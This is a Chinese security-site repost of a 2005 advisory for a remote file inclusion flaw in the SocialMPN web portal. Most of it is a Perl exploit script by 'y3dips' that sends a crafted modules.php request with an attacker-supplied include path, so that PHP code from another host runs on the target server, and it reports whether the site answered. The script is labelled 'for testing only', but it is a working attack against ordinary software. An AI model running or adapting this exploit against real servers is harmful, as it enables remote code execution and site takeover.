首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SocialMPN Arbitrary File Injection Exploit
来源:y3dips 作者:zer0-c00l 发布时间:2005-03-11  

SocialMPN Arbitrary File Injection Exploit

Summary
SocialMPN is "very similar to myPHPNuke, however the biggest change to the system is the multi-site functionality we have incorporated into the package".

A vulnerability in the way SocialMPN handles external modules allows a remote attacker to include his own arbitrary PHP code that would then be executed by the SocialMPN environment. The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by y3dips.

Details
Exploit:
#!/usr/bin/perl -w

# Remote Testing SocialMPN Remote File Inclusion by y3dips [for testing only]
# Bug find by zer0-c00l ,
# Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html

print " * Remote Testing File Inclusion for SocialMPN by y3dips *\n";

require LWP::UserAgent;

if(@ARGV == 2)
{

$target= $ARGV[0];
$xploit= $ARGV[1];


my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target/modules.php?name=$xploit&file=article&sid=2";
# just for trick , use "?" in the last char of your file inclusion path

my $injek = $ua->get($url);

print " -------------------------------\n";
if ($injek->is_success)
{
$injekcek = $injek->as_string;
if ($injekcek =~ /(HTTP\/1\.0 200 OK)/)
{ print("\n This Site Maybe Vulnerable \n"); }
else
{die $injek->status_line;}
print " -------------------------------\n";
}
}

else{
print "Use: perl $0 [target] [xplo.txt] \n";
}

#EOF y3dips(c)2005
#shout : zer0-c00l , echo staff @ ehco.or.id



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ethereal 3G Remote Buffer Over
·Xpand Rally Format String Vuln
·Internet Explorer CSS File Rem
·Chaser Nickname Buffer Overflo
·Ethereal v0.10.9 RADIUS Auth.
·Carsten's 3D Engine Format Str
·paNews v2.0b4 Remote SQL Injec
·Codename Eagle <= 1.42 sock
·Buffer Overflow in Knet
·RICOH Aficio 450/455 PCL 5e Pr
·RealPlayer SMIL File Handling
·Linux kernel 2.4 and 2.6 Multi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved